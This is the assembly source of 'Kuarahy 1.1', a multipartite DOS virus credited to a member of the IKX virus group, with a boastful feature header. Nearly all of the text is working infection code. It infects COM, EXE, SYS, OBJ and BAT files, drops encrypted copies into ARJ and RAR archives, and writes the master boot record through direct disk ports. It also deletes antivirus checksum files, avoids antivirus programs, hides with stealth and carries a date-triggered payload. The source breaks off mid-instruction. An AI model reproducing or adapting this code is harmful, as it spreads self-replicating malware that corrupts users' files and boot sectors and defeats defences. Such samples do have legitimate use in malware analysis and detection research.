Comment %
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Multipartite COM/EXE/OVL/SYS/OBJ/BAT/ARJ/RAR/BS/MBR encrypted fast infector ³
³ 10 different targets                                                        ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

V ßßßÛ ÜÛß Û Û ÜßßßßÜ ßÛßßßßÜ ÜßßßßÜ Û Û Û Û
I Û ÜÛ Û Û Û Û Û Û Û Û Û Û ßÛ Ûß
R ÛÛÛ Û Û ÛÜÜÜÜÛ ÛÜÜÜÜß ÛÜÜÜÜÛ ÛÜÜÜÜÛ ßÛÜÛß
U Û ßÛÜ Û Û Û Û Û Û Û Û Û Û Û
S Û ÛÜÜ ÛÜÜÜÜß Û Û Û ßÛ Û Û Û Û Û

Version 1.1

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Programmed by Int13h of IKX Virus Group (Int13h@antisocial.com)             ³
³ Made in Paraguay - South America                                            ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

In this upgraded version I added infection of RAR files; it drops itself in
encrypted form over ARJ and RAR archives in rnd files. Tunnels by PSP tracing.
Anti-tunneling. BS/MBR stealth on reads. Two ways of hooking Int 21h. Doesn't
infect some lame programs. Protects Int 21h in AX=2521h and AX=3521h. Uses SFT.
Doesn't infect philes immunized with CPAV & EXEs with overlays. Deletes AV
checksum philes. Infects MBR by direct writing to HD ports. A cool payload
activates on day 13. It consists of a change of the default text mode character
set. Formats an extra track in floppies. It doesn't have a poly engine, but a
routine to change pointer, keyword and operation in the main decryptor. The MBR
can be infected from all the infected hosts. Does other stuph.

> > > Greetz to IKX members and to all my IRC-friends < < <
%
; Compile under Turbo Assembler 4.0 and Turbo Link 6.10 from Borland Intl.
.model tiny .code jumps ; Lazyness r0x0r .186 org 0h Longitud = (offset FakeHoste-offset Kuarahy) Largor = (offset Omega-Offset Kuarahy) HeaderSize = (EndRARHeader-RARHeader) ParraVir1 = ((Longitud+15)/16)+1 ParraVir2 = ((Longitud+15)/16) VirusEnPara = (Largor+15)/16 KUARAHY:jmp MuLTiSuCKeo ; KUARAHY.4774 nop org 03eh MuLTiSuCKeo: db 0beh ; mov si... Pointer:dw offset Encriptado+07c00h mov cx,0d8h Descifra: db 02eh db 081h,034h ; xor word ptr [si],... ClaveB dw 0 inc si inc si Marca: loop Descifra Encriptado: cmp word ptr ds:[0],020cdh ; Check 4 PSP jne Desde_Boot_o_MBR ; looking the INT 20h at field 0 jmp Desde_un_Phile ; Execution from a file Desde_Boot_o_MBR: ; Execution from MBR or BS sub ax,ax cli mov ss,ax ; Set SS:SP mov sp,07c00h sti cld push ss pop ds int 12h sub ax,12 ; Eat 12kb! mov ds:[0413h],ax mov cl,6 shl ax,cl mov es,ax ; ES is our new house at TOM mov si,07c00h xor di,di mov cx,256 repe movsw ; Move virus first part at TOM mov ax,0209h ; Read the other sectors where the mov bx,offset ParteII ; virus body is stored cmp byte ptr es:[DondeEstamos],'F' je FDisk ; Check if we are in a FD or HD mov cx,0003h ; Track 0, Sector 3 mov dx,0080h ; Head 0 jmp short Uplodearse FDisk: mov cx,5002h ; Track 80, Sector 2 sub dx,dx ; Head 0, drive A: Uplodearse: int 13h mov ax,0209h int 13h jc Vamonos push es mov bx,offset Arriba push bx retf ; Jump to our segment! DondeEstamos db 'F' Revisar db 'S' Cuenta db 0 ARRiBa: mov ax,32d call Desde_un_Phile ; Decrypt encrypted virus body mov byte ptr cs:[Cuenta],0 ; Initialize vars mov byte ptr es:[Revisar],'S' mov byte ptr es:[Bandera],'N' mov ax,word ptr ds:[13h*4] ; Hook the kewlest int :) mov word ptr es:[Offset_de_la_13h],ax mov word ptr ds:[13h*4],offset Nueva13Handler mov ax,word ptr ds:[(13h*4)+2] mov word ptr es:[Segmento_de_la_13h],ax mov word ptr ds:[(13h*4)+2],es mov ax,0201h ; Read MBR mov bx,offset MBRBS mov cx,0001h mov dx,0080h pushf call dword ptr cs:[Offset_de_la_13h] jc Vamonos ; Grrr! 
cmp word ptr es:[bx+offset Marca],0f7e2h je Vamonos ; Infected? mov byte ptr es:[DondeEstamos],'H' push ds push es pop ds xor di,di Reutilizar: mov ax,0301h ; Write original MBR mov bx,offset MBRBS mov cx,0002h ; Track 0, Sector 2 mov dx,0080h ; Head 0 int 13h mov byte ptr cs:[QueEs],'b' push di ds es mov bp,020fh ; Generate an encrypted copy call Encriptor pop es ds di mov si,offset ParaOuting mov bx,offset CopiaVirus ; Infect MBR via ports call Direct_HD_Write_Using_Ports mov ax,0309h ; Write the virus body to other sectors mov bx,offset CopiaVirus+200h mov cx,0003h mov dx,0080h int 13h cmp di,32 ; Check our flaggy jne StillWeGo ret StillWeGo: pop ds mov byte ptr es:[DondeEstamos],'F' Vamonos: cmp byte ptr es:[DondeEstamos],'F' ; FD or HD? je Floppy mov dx,0080h ; Head 0 mov cx,0002h ; Track 0, sector 2 jmp short CargarOriginal Floppy: xor dx,dx ; Head 0, drive A: mov cx,5001h ; Track 80, sector 1 CargarOriginal: push ds pop es mov bx,07c00h mov ax,0201h ; Load original MBR or BS int 13h mov ax,0201h int 13h db 0eah ; Execute the sucker dw 07c00h dw 0 Nueva13Handler: call kill_tunnel cmp ax,0cd13h ; Are you there? je Chequeo cmp ah,03h ; Writing? je Hookear_Int21h cmp ah,02h ; Reading? jne Normal cmp cx,0001h ; Track 0, sector 1? jne Normal test dx,dx ; Head 0, drive A:? je Infectar cmp dx,0080h ; Head 0, hard disk? je Stealth_MBR Normal: db 0eah Offset_de_la_13h dw 0 Segmento_de_la_13h dw 0 Stealth_MBR: push cx mov cl,02h ; Read original MBR in user's buffer int 13h pop cx retf 2 Stealth_BS: push ax push cx push dx mov ax,0201h xor dx,dx mov cx,5001h ; Read original BS in fool's buffer pushf call dword ptr cs:[Offset_de_la_13h] mov ax,0201h pushf call dword ptr cs:[Offset_de_la_13h] pop dx pop cx pop ax retf 2 db " >KUARAHY< Koa ha'e Int13h/IKX rembiapoku‚ hina! :) " org 1feh db 55h,0aah org 200h ; First sector ParteII label byte ; Second virus part follow Desde_un_Phile: db 0beh ; mov si... 
Puntero dw 020fh mov cx,((Largor-200h)-0fh)/2 Decrypta: db 02eh db 081h,034h ; xor word ptr [si],... ClaveF dw 0 inc si inc si loop Decrypta cmp ax,32 jne Getear_Delta ret Getear_Delta: call Delta Delta: pop bp sub bp,offset Delta cmp byte ptr cs:[bp+QueEs],'S' je Strategy_Routine ; Is a .SYS hoste? mov ax,0cd13h ; Are you there? int 21h cmp ax,013cdh jne Instalar jmp MemoriaYaPodrida ; Yes, I am Instalar: push es mov ax,3521h ; Get INT 21h handler int 21h mov cs:[bp+word ptr Abuela21h],bx mov cs:[bp+word ptr Abuela21h+2],es mov cs:[bp+word ptr Real21h],bx mov cs:[bp+word ptr Real21h+2],es push ds lds bx,ds:[0006h] ; Trace PSP. 10x SLH Tracear:cmp byte ptr ds:[bx],0eah jne Chekear lds bx,ds:[bx+1] cmp word ptr ds:[bx],9090h jnz Tracear sub bx,32h cmp word ptr ds:[bx],9090h jne Chekear Hallado:mov cs:[bp+word ptr Real21h],bx mov cs:[bp+word ptr Real21h+2],ds jmp short MCBTSR Chekear:cmp word ptr ds:[bx],2e1eh jnz MCBTSR add bx,25h cmp word ptr ds:[bx],80fah je Hallado MCBTSR: pop ds mov ax,0cd13h ; Is virus TSR from BS or MBR? 
int 13h cmp ax,013cdh jne ModificarMCB ; No, then go and play with MCBs push bx ; Yes it is, viral segment in BX pop es ; We will hook INT 21h directly push cs pop ds lea si,cs:[bp+word ptr Abuela21h] mov di,offset Abuela21h ; Fill our variables movsw movsw lea si,cs:[bp+word ptr Real21h] mov di,offset Real21h movsw movsw xor ax,ax mov es,ax cli mov di,21h*4 ; And hook the int mov ax,offset Viral21Handler stosw mov ax,bx stosw sti pop es jmp MemoriaYaPodrida ModificarMCB: mov ax,ds ; TSR via MCB dec ax mov es,ax mov ax,es:[3] sub ax,ParraVir1 xchg bx,ax push ds pop es mov ah,4ah ; Free unused mem int 21h mov ah,48h ; Allocate mem mov bx,ParraVir2 int 21h dec ax mov es,ax mov word ptr es:[1],8 ; DOS's mov word ptr es:[8],'Ky' ; Block name: KY (Kuarahy) inc ax mov es,ax xor di,di push cs pop ds lea si,[bp+offset Kuarahy] mov cx,Longitud rep movsb ; Copy virus to our segment mov byte ptr es:[Bandera],'N' push es pop ds mov ax,2521h ; Hook the int mov dx,offset Viral21Handler int 21h pop es MemoriaYaPodrida: mov ax,0cafeh ; Call MBR infection service int 21h cmp byte ptr [bp+QueEs],'C'; COM? je CorrerCOM cmp byte ptr [bp+QueEs],'B'; BAT? je CorrerBAT cmp byte ptr [bp+QueEs],'O'; OBJ? je CorrerOBJ xor di,di cmp byte ptr [bp+QueEs],'A' ; ARJ? je CorrerARJ_RAR cmp byte ptr [bp+QueEs],'R' ; RAR? je CorrerARJ_RAR ; EXE/OVL file mov ah,2ah ; Get date int 21h cmp dl,13d ; Day=13? 
jne SigaNomas mov di,32 push es bp call CorrerARJ_RAR ; Change text fonts pop bp es xchg cx,ax int 16h SigaNomas: push es pop ds mov bx,bp mov ax,es add ax,10h ; Acount 4 PSP add cs:[(bx+CS_IP)+2],ax cli add ax,cs:[(bx+SS_SP)+2] mov ss,ax mov sp,cs:[bx+SS_SP] sti call Limpiar ; Clear regs db 0ebh,0h ; Clear prefetch queue db 0eah ; Restore control to .EXE CS_IP dw offset FakeHoste,0h SS_SP dw 0,0 CorrerCOM: ; COM file call Segmentos lea si,[bp+offset Vafer] ; Points to original bytes mov di,100h push di cld movsb ; Restore them movsw Limpiar:xor ax,ax sub bx,bx xor cx,cx sub dx,dx xor si,si sub di,di xor bp,bp ret ; Run COM or return to caller CorrerBAT: ; BAT file call segmentos mov ax,word ptr ds:[2ch] ; Fill the table mov word ptr [bp+FCB1],cs ; for 4bh execution mov word ptr [bp+FCB2],cs mov word ptr [bp+PSP],ax mov word ptr [bp+SLINEA],cs mov es,word ptr ds:[2ch] ; Environment segment sub ax,ax mov di,1 Look4Zero: dec di scasw ; Look 4 doble-zero jnz Look4Zero inc di ; Points to filename inc di push es pop ds push cs pop es ; Copy filename to our buffer mov si,di lea di,[bp+offset RARHeader] mov cx,128d rep movsb push cs cs pop ds es ; CS=DS=ES sub al,al ; Look for the 0 of the ASCIIZ string lea di,[bp+offset RARHeader] mov cx,125d repne scasb mov word ptr [di-4],'AB' ; Change extension to .BAT mov byte ptr [di-2],'T' mov si,80h ; Command line dec di mov cl,byte ptr ds:[80h] ; Quantity of characters xor ch,ch inc cl mov si,81h rep movsb lea si,[bp+offset Linea] ; Move all to the command line in PSP mov di,080h Otravez:lodsb cmp al,0dh ; ENTER? 
0dh je Termino stosb jmp OtraVez Termino: stosb sub di,81h mov cx,di ; Calculate new lenght mov byte ptr ds:[080h],cl ; Update offset 80h of PSP cli mov sp,6000d ; Reajust stack sti mov ah,4ah ; Free memory mov bx,(Largor+4000)/16 int 21h lea dx,[bp+offset RunMe] mov ax,4b00h ; Execute the sucker lea bx,[bp+offset PSP] int 21h mov ah,4dh ; Get exit code int 21h ; ERRORLEVEL mov ah,4ch ; And exit to DOS int 21h CorrerOBJ: ; OBJ file (COM when compiled) call Segmentos lea si,[bp+offset Copier] ; Point to our little code mov di,64000 ; Copy it in the heap mov ax,di mov cx,5 rep movsw movsb lea si,[bp+offset Omega] ; Points to hoste mov di,100h ; Destination offset push di mov cx,60000 xor bx,bx xor dx,dx jmp ax Copier: repe movsb ; Move host at 100h, in memory xor si,si sub di,di xor ax,ax sub cx,cx ret ; Give control to him CorrerARJ_RAR: ; ARJ/RAR file call Segmentos mov ah,9 ; Copyright lea dx,[bp+offset Copyright] int 21h mov cx,26d lea si,[bp+offset Letras] mov bp,si mov dx,'A' Cicling:push cx mov ax,1100h mov bx,0e00h ; Change text fonts mov cx,01 int 10h inc dx add bp,14 pop cx Loop Cicling cmp di,32 jne SaleAlDos ret SaleAlDOS: ; EXIT to DOS if ARJ/RAR, acting int 20h ; like a shareware program :) Viral21Handler: ; KUARAHY handler of INT 21h call kill_tunnel cmp ax,0cd13h ; Resident check je Chequeo cmp ax,0cafeh ; MBR sucking service je InfectarMBR cmp ah,04bh ; Execution je Analizar cmp ah,056h ; Rename je Analizar cmp ah,043h ; Get/Set attribs je Analizar cmp ah,3dh ; Open je Analizar cmp ax,6c00h ; Extended open je Analizar cmp ax,03521h ; Protect Int 21h je Ocultar21h_A cmp ax,02521h ; Protect Int 21h je Ocultar21h_B cmp ax,05700h ; Hide wrong seconds je Stealth_Segundos1 cmp ax,05701h ; Protect wrong seconds je Stealth_Segundos2 db 0eah ; Normal INT normal Abuela21h dw 0,0 Ocultar21h_A: ; Give him the old handler mov bx,cs:[word ptr Abuela21h] mov es,cs:[word ptr Abuela21h+2] iret Ocultar21h_B: ; Put him as the old handler mov cs:[word ptr Abuela21h],dx 
mov cs:[word ptr Abuela21h+2],ds iret Stealth_Segundos2: push dx push cx mov ax,5700h pushf call dword ptr cs:[Real21h] and cl,00011111b cmp cl,00011110b jne Tranquilopa pop cx and cl,11100000b or cl,00011110b ; Still marked as infected push cx Tranquilopa: pop cx pop dx mov ax,5701h pushf call dword ptr cs:[Real21h] iret Stealth_Segundos1: ; Hide wrong seconds pushf call dword ptr cs:[Real21h] push cx and cl,00011111b cmp cl,00011110b jne NoPasaNada pop cx and cl,11100000b or cl,1 push cx NoPasaNada: pop cx iret Manejador24h: ; Error handler mov al,03 iret Analizar: ; Check DS:DX 4 victims pushf push ax bx cx dx si di bp ds es cmp ax,6c00h jne No_Apertura_Extendida cmp dx,0001 jne JustPOPs mov dx,si No_Apertura_Extendida: push dx ds mov ax,3524h ; 24h handler int 21h mov word ptr cs:[Vieja24h],bx mov word ptr cs:[(Vieja24h)+2],es push cs pop ds mov ax,2524h ; Hook it mov dx,offset Manejador24h int 21h pop ds dx mov word ptr cs:[Victima],dx mov word ptr cs:[Victima+2],ds mov bx,ds push ds pop es cld mov di,dx mov cx,128 mov al,'.' ; Search the . 
repne scasb jnz PopAll mov ax,word ptr es:[di-3] ; Check name or ax,02020h cmp ax,'dn' ; commaND je PopAll cmp ax,'na' ; scAN / cleAN / tbscAN / tbcleAN je PopAll cmp ax,'va' ; tbAV / nAV je PopAll cmp ax,'to' ; fool-prOT je PopAll cmp ax,'dr' ; guaRD je PopAll cmp ax,'ur' ; findviRU je PopAll cmp ax,'ti' ; toolkIT je PopAll cmp ax,'pv' ; aVP je PopAll cmp ax,'ni' ; wIN je PopAll cmp ax,'pl' ; ifshLP je PopAll push cs pop es mov si,offset Cabecera xchg si,di ; Check extension movsw movsb call Segmentos call Checar_Ext jc PopAll Abrir: mov ax,3d00h ; Open in read-only mode pushf call dword ptr cs:[Real21h] jc PopAll xchg bx,ax push cs pop ds mov byte ptr ds:[DondeEstamos],'H' push es bx mov ax,1220h int 2fh mov ax,1216h xor bh,bh mov bl,es:[di] int 2fh mov cl,byte ptr es:[di+4] ; Manipulate SFT mov byte ptr [AtribsFile],cl mov byte ptr es:[di+4],20h mov byte ptr es:[di+2],2 mov word ptr [SFT],di mov word ptr [SFT+2],es pop bx es mov ax,4301h mov dx,offset Basura1 sub cx,cx pushf call dword ptr cs:[Real21h] mov ah,41h ; Delete AV checksum files mov dx,offset Basura1 int 21h mov ah,41h mov dx,offset Basura2 int 21h mov ah,41h mov dx,offset Basura3 int 21h mov ah,41h mov dx,offset Basura4 int 21h mov ax,5700h ; Get time/date pushf call dword ptr ds:[Real21h] mov word ptr ds:[Time],cx mov word ptr ds:[Date],dx mov word ptr ds:[TimeDate+2],dx and cl,00011111b cmp cl,00011110b ; 30*2= ¨60? jne Conti ; Infected? jmp PopAll Conti: mov ah,3fh ; Read 45 bytes mov cx,45d mov dx,offset Cabecera int 21h mov si,dx mov ax,[si] jmp SaltarAdondeCorresponda InfectarCOM: ; .COM infection push bx mov ah,30h int 21h pop bx cmp al,7 ; No activity if DOS >=7 jae Cerrar call AlFinal test dx,dx jnz Cerrar cmp ax,58000d ; Check size ja Cerrar cmp ax,666d jbe Cerrar cmp word ptr [si+11d],'TW' ; Sucked with CPAV? 
je Cerrar mov di,offset Vafer ; Take original bytes movsw movsb sub ax,3 mov word ptr [Salto+1],ax mov bp,ax add bp,312h ; Encrypt virus call Encriptor mov cx,Largor mov dx,offset CopiaVirus mov ah,40h int 21h ; Infect file with the encrypted copy call AlInicio mov ah,40h ; Put the JMP mov cx,3 mov dx,offset Salto int 21h jmp SalteAqui InfectarEXE: ; .EXE infection cmp byte ptr [QueEs],'S' je Cerrar cmp word ptr [si+018h],0040h jae Cerrar cmp word ptr [si+01ah],0000 jne Cerrar ; Overlay? cmp word ptr [si+43d],'TW' ; Sucked with CPAV's code? je Cerrar call AlFinal mov cx,512d div cx or dx,dx je NoHayResto inc ax NoHayResto: cmp word ptr [si+02h],dx jne Cerrar cmp word ptr [si+04h],ax jne Cerrar call AlFinal ; EXE infection in the usual way push bx push dx ax ; Size to stack les ax,dword ptr [(Cabecera+014h)] mov [CS_IP],ax mov [(CS_IP+2)],es les ax,dword ptr [(Cabecera+0eh)] mov word ptr [SS_SP],es mov word ptr [(SS_SP+2)],ax mov ax,word ptr [(Cabecera+08h)] mov cl,4 shl ax,cl xchg bx,ax pop ax dx ; Size from stack push ax dx sub ax,bx sbb dx,0 mov cx,10h div cx mov word ptr [(Cabecera+014h)],dx mov bp,dx mov word ptr [(Cabecera+016h)],ax mov word ptr [(Cabecera+0eh)],ax mov word ptr [(Cabecera+010h)],0 pop dx ax add ax,Largor adc dx,0 mov cl,9 push ax shr ax,cl ror dx,cl or dx,dx stc adc dx,ax pop ax and ah,1 mov word ptr [(Cabecera+4)],dx mov word ptr [(Cabecera+2)],ax mov ax,word ptr [(Cabecera+0ah)] clc add ax,VirusEnPara jc NoAgregarMemoria mov word ptr [(Cabecera+0ah)],ax NoAgregarMemoria: mov word ptr [(Cabecera+0ch)],0ffffh pop bx add bp,20fh call Encriptor mov cx,Largor mov ah,40h mov dx,offset CopiaVirus int 21h call AlInicio mov ah,40h ; Write new header mov cx,01ah mov dx,offset Cabecera int 21h SalteAqui: call PongoFecha ; Restore time/date call Reatributear ; & attributes Cerrar: mov ah,3eh ; Close sucker int 21h PopAll: push cs pop ds mov ax,2524h lds dx,dword ptr cs:[offset Vieja24h] int 21h ; Restore Error Handler JustPOPs: pop es ds bp di si dx cx 
bx ax popf jmp dword ptr cs:[Abuela21h] InfectarSYS: ; .SYS infection cmp byte ptr [QueEs],'S' jne Cerrar mov ax,word ptr [si+6] ; Strategy routine mov word ptr [Vieja_Estrategica],ax call AlFinal mov word ptr [Cabecera+6],ax ; Point strategy routine to the second virus decryptor add word ptr [Cabecera+6],offset Desde_un_Phile mov bp,ax add bp,20fh ; Encrypt the viruz call Encriptor mov cx,Largor mov ah,40h mov dx,offset CopiaVirus ; Write to the .SYS int 21h call AlInicio mov ah,40h mov cx,10 ; Write modified SYS header mov dx,offset Cabecera int 21h jmp SalteAqui Strategy_Routine: ; .SYS strategy routine db 0b8h Vieja_Estrategica dw 0 push ax bx cx dx si es ds ; Old strategy routine in the stack push cs cs pop ds es mov ax,0cd13h ; Virus in memory? int 13h cmp ax,013cdh je Checar_Payload ; If it is resident, then MBR=infected mov ax,0201h ; Read MBR lea bx,[bp+offset Omega] mov cx,1 mov dx,0080h int 13h cmp word ptr es:[bx+offset Marca],0f7e2h je Checar_Payload ; Infected? mov ax,0301h ; Write MBR to sector 2 mov cx,2 int 13h mov word ptr es:[bp+offset ClaveF],0 mov si,bp push si add si,offset Pointer ; Modify offset in the 1§ decryptor mov word ptr [si],offset Encriptado+07c00h pop bx lea si,[bp+offset ParaOuting] ; Infect MBR using ports call Direct_HD_Write_Using_Ports mov ax,0309h ; Write virus body in contiguos sectors lea bx,[bp+offset ParteII] mov cx,0003h mov dx,0080h int 13h Checar_Payload: mov ah,04 ; Get date int 1ah cmp dl,013h ; Day=13? 
jne Popear call Epsilon Epsilon:pop bx sub bx,offset Epsilon lea si,[bx+offset Copyright] mov cx,(offset Hehe-offset Copyright)-1 Payload:lodsb sub bx,bx mov ah,0eh ; Print copyright int 10h loop Payload xor ax,ax ; Pause int 16h Popear: pop ds es si dx cx bx sub ax,ax ret ; Jump to original strategy routine InfectarOBJ: ; .OBJ infection cmp byte ptr [QueEs],'O' jne Cerrar call AlInicio xor di,di OtroCampo: call Lectura cmp al,0a0h ; Kewlest field type ;) jz ModificarValor cmp al,0a2h jz ModificarValor ; Look on OBJ infection tutorial cmp al,8ah ; for more info jz Ultimo cmp al,8ch jz Cerrar Punterear: mov ax,4201h ; Move pointer to the following xor cx,cx ; field int 21h jnc OtroCampo jmp Cerrar ModificarValor: push dx mov ax,4201h sub cx,cx cwd int 21h push dx ax ; Save current pointer location mov ah,3fh mov cx,3 ; Read 3 bytes mov dx,offset Entrada int 21h or di,di ; Checking flag jnz NoEsElPrimerA0 inc di ; Modify flag state ; IP=100h? cmp word ptr [Entrada+1],100h je NoEsElPrimerA0 cli add sp,6 ; Correct stack pointer sti jmp Cerrar NoEsElPrimerA0: ; Modify offset in memory, adding the virus size to it add word ptr [Entrada+1],Largor pop dx cx push cx dx mov ax,4200h ; Move pointer back int 21h mov ah,40h mov dx,offset Entrada ; Write modified field mov cx,3 int 21h pop dx cx mov ax,4200h ; Correct pointer position int 21h pop dx jmp Punterear Ultimo: mov cx,0ffffh ; Pointer to the last field (8a) mov dx,0fffdh mov ax,4201h int 21h mov cx,6 mov dx,offset VirusOBJRecord mov ah,40h ; Write a field for our virus, with int 21h ; IP=100h then when compiled we will ; have Virus+Hoste mov bp,030fh call Encriptor ; Generate an encrypted virus mov ah,40h mov cx,Largor mov dx,offset CopiaVirus ; Write our encrypted code int 21h mov ah,40h mov cx,10 ; Write the ending field mov dx,offset Finalizacion int 21h jmp SalteAqui ; And dirty work is finished ; Let's the user start his compiler >:) InfectarBAT: ; .BAT infection call PongoFecha ; Mark BAT as infected push es call 
Reatributear ; Restore his attribs pop es mov ah,3eh ; And close it int 21h lds si,dword ptr cs:[Victima] mov di,offset Filename ; Recover filename mov dx,di mov cx,128 Followtheblind: lodsb cmp al,'.' ; Wait for the period je Completa stosb ; Copy to our buffer Loop Followtheblind Completa: stosb ; Store the . push cs pop ds mov word ptr [di],'OC' mov word ptr [di+2],004dh ; Adds .COM+0 mov ah,3ch ; Create that file mov cx,20h int 21h jc PopAll xchg bx,ax push dx mov bp,030fh ; Create encrypted virus copy call Encriptor mov cx,Largor mov ah,40h ; And write that to the phile mov dx,offset CopiaVirus int 21h mov ah,3eh ; Now close it int 21h pop dx push dx mov ax,03d02h ; Open it pushf call dword ptr cs:[Real21h] xchg bx,ax call PongoFecha ; Mark as infected mov ah,3eh ; Close it int 21h pop dx mov ax,4301h mov cx,23h ; Set read-only+hidden attributes pushf call dword ptr cs:[Real21h] jmp PopAll db 'NIHIL ASSEMBLER MAIUS!' InfectarRAR: cmp ax,06153h ; It was a "Ra"? jne Cerrar call Segmentos mov di,offset RARname ; Points to the name mov cx,4 call Changer ; Make a random name mov bp,030fh ; Create encrypted virus copy call Encriptor mov ax,4202h cwd xor cx,cx ; Go to EOF int 21h mov si,offset CopiaVirus mov cx,Largor call CRC32 ; Get our CRC mov word ptr [RARCRC32+2],dx mov word ptr [RARCRC32],ax ; Save it in our RARheader mov si,offset RARHeader+2 ; Make CRC of header mov cx,HeaderSize-2 call CRC32 mov word ptr [RARHeaderCRC],ax mov ah,40h mov dx,offset RARHeader ; Write our header mov cx,HeaderSize int 21h mov word ptr [RARHeaderCrc],0 mov word ptr [RARCrc32],0 ; Blank CRC values mov word ptr [RARCrc32+2],0 mov dx,offset CopiaVirus mov cx,Largor ; ADD the encrypted virus mov ah,40h int 21h jmp SalteAqui InfectarARJ: ; .ARJ infection. Thanks to call Segmentos ; my kewl friend Star0/IKX! 
mov di,offset Agregar ; Points to the name mov cx,4 call Changer ; Get a random name mov bp,030fh ; Create encrypted virus copy call Encriptor mov ax,4202h xor cx,cx ; Go to EOF cwd int 21h xchg cx,dx mov dx,ax sub dx,4 sbb cx,1 add cx,1 mov ax,4200h ; Move our pointer int 21h mov si,offset CopiaVirus mov cx,Largor ; Calcule CRC of our code call CRC32 mov word ptr [ArjCrc32],ax mov word ptr [ArjCrc32+2],dx mov ah,40h mov cx,offset SecondSide-HeaderARJ mov dx,offset HeaderARJ int 21h mov cx,ArjHeaderCrc-ArjHsmsize mov si,offset ArjHsmSize call CRC32 mov word ptr [ArjHeaderCrc],ax mov word ptr [ArjHeaderCrc+2],dx mov ah,40h mov cx,EndSide-SecondSide mov dx,offset SecondSide int 21h mov word ptr [ArjCrc32],0 ; Blank variables mov word ptr [ArjCrc32+2],0 mov word ptr [ArjHeaderCrc],0 mov word ptr [ArjHeaderCrc+2],0 mov ah,40h mov cx,Largor mov dx,offset CopiaVirus ; Drop an encrypted virus copy int 21h mov word ptr [ArjHeadSiz],0 mov ah,40h mov cx,4 mov dx,offset HeaderARJ int 21h jmp SalteAqui Reatributear: ; Restore attribs using SFT les di,dword ptr cs:[SFT] mov cl,byte ptr cs:[AtribsFile] mov byte ptr es:[di+4],cl ret SaltarAdondeCorresponda: ; Check out what to infect cmp ax,'ZM' je InfectarEXE cmp ax,'MZ' ; EXE je InfectarEXE cmp byte ptr [QueEs],'C' ; It is COM? je InfectarCOM cmp al,080h ; Begings with 80h? It is an OBJ je InfectarOBJ inc ax jz InfectarSYS ; FFFF+1=0 then device driver? cmp byte ptr [QueEs],'B' ; Is a batch one je InfectarBAT cmp byte ptr [QueEs],'A' ; ARJ file je InfectarARJ cmp byte ptr [QueEs],'R' ; RAR file je InfectarRAR jmp Cerrar Changer: ; Generates random name for the push cx ; file that we will add to the .ARJ mov cx,25 ; RND between 0-25 call Get_RND add ax,64 ; A-Z stosb pop cx loop Changer ret Contador dw 0 ; Infection counter Copyright db 13,10,' [KUARAHY 1.1 by Int13h/IKX] - Written in Paraguay - Please register! 
',13,10,'$' Hehe db 'DOS Infection Machine',2 Bandera db 'N' Salto db 0e9h,00h,00h ; 4 jmp construction db ' Learn some guaran¡ words!:' db 'Kuarahy=Sun A¤ =Devil Ku¤ =Woman ' Vafer db 090h,0cdh,020h ; Original COM bytes Targets db 'execomsysobjbatovlarjrar'; Infectable extensions QueEs db 'E' ; Hoste flag Real21h dw 0,0 ; Original 21h handler PongoFecha: inc word ptr cs:[Contador] ; Update counter mov ax,5701h db 0b9h Time dw 0 ; Restore date/time and mark as and cl,11100000b ; an infected one or cl,00011110b db 0bah Date dw 0 pushf call dword ptr cs:[Real21h] ret db ' E-mail me: Int13h@antisocial.com ' AlInicio: ; For pointer movements mov ax,04200h jmp short Despl AlFinal:mov ax,04202h Despl: xor cx,cx cwd int 21h ret Segmentos: ; DS:=CS & ES:=CS push cs cs pop ds es ret Get_RND:push dx ; Random # Generator push di in ax,40h mov dx,106 mul dx add ax,1283 mov di,6075 adc dx,0 div di mov ax,dx mul cx div di pop di pop dx inc ax ret Hookear_Int21h: ; Try to hook int 21h cmp byte ptr cs:[Revisar],'S' jne Retornemos ; Check the flag... 
inc byte ptr cs:[Cuenta] ; Update our counter cmp byte ptr cs:[Cuenta],8 ; 8 writes, we will hook Int 21h then jbe Retornemos push ds push ax push bx xor ax,ax mov ds,ax ; DS=IVT mov ax,word ptr ds:[21h*4] ; Fill our vars mov bx,word ptr ds:[(21h*4)+2] mov word ptr cs:[Abuela21h],ax mov word ptr cs:[Abuela21h+2],bx mov word ptr cs:[Real21h],ax mov word ptr cs:[Real21h+2],bx cli ; Hook Int 21h mov word ptr ds:[21h*4],offset Viral21Handler mov word ptr ds:[(21h*4)+2],cs sti mov byte ptr cs:[Cuenta],0 ; Clear counter mov byte ptr cs:[Revisar],'N' pop bx pop ax pop ds Retornemos: jmp Normal ; Normal INT 13h Encriptor: ; Virus's encryptor call Segmentos mov word ptr [Puntero],bp ; Pointer for 2§ decryptor sub bp,01c2h ; Calculate the pointer for mov word ptr [Pointer],bp ; 1§ decryptor in al,40h xchg ah,al in al,40h ; Get keyword for 2§ decryptor mov word ptr [ClaveF],ax xor si,si mov di,offset CopiaVirus mov cx,Longitud ; Copy virus to buffer rep movsb mov si,offset CopiaVirus+020fh mov ax,word ptr [ClaveF] mov cx,((Largor-200h)-0fh)/2 Proseguir: xor word ptr [si],ax ; Encrypt Kuarahy inc si inc si loop Proseguir in al,40h xchg ah,al in al,40h ; Get keyword for 1§ decryptor mov word ptr [ClaveB],ax mov cx,300 ; Get a random operation XOR/SUB/ADD call Get_RND mov di,offset ClaveB-2 cmp ax,100 ja SUBEAR mov cl,1 ; XOR mov ax,03481h stosw mov di,offset 